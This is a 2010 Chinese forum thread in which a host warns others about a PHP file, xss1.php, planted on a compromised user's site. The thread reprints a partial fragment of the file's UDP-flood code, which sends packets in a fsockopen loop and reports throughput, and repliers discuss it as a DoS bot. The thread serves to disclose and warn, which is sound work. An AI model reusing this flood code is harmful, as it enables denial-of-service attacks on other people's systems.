发一个php 攻击代码.大家注意. [复制链接]
查看:302 | 回复:28

诡谲 · 发表于 2010-12-4 12:03:10

今天收到服务商的警告.说有outgoing dos attack.并给了几个IP让我检查.
检查后发现一个用户的网站应该是被挂马,许多目录下存在这样一个文件: xss1.php,里面的内容如下:[ol]

$max_time){ break; }

$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);

if($fp){ fwrite($fp, $out);

fclose($fp); }}

echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";?>[/ol]复制代码请勿用于非法用途

[ 本帖最后由诡谲于 2010-12-4 12:19 编辑 ]

cnx · 发表于 2010-12-4 12:25:28

表示看不懂代码的我路过。

hz555 · 发表于 2010-12-4 12:26:40

这个应该不是马吧！都是代码！没连接地址！

tc101 · 发表于 2010-12-4 12:27:54

用socket而已，可以禁用的。

wdlth · 发表于 2010-12-4 12:27:55

难道这是dos？？

yugan300 · 发表于 2010-12-4 12:28:43

这个是被挂的马吧？
相当于个小“僵尸”了，呵呵，接受黑客的URL输入参数IP向该IP的端口发UDP Flood攻击。。
网站有上传功能的应该小心。

[ 本帖最后由 liheyuan 于 2010-12-4 12:30 编辑 ]

小白 · 发表于 2010-12-4 12:29:06

这是端口扫描。

liheyuan · 发表于 2010-12-4 12:29:07

呃，看错了，看到65535就自动默认了。。第一行：这个程序不限时，一直执行完毕
第二行：这个程序不理会使用者是否关闭浏览器，都会在服务器端执行完毕
后面是fsockopen提交。。。。

去D别人的吧

zllovesuki · 发表于 2010-12-4 12:30:08

还是隐藏吧。无聊的人太多了

zllovesukimslxd · 发表于 2010-12-4 12:31:07

学习中，

发一个php 攻击代码.大家注意. [复制链接] 查看:302 | 回复:28

发一个php 攻击代码.大家注意. [复制链接]
查看:302 | 回复:28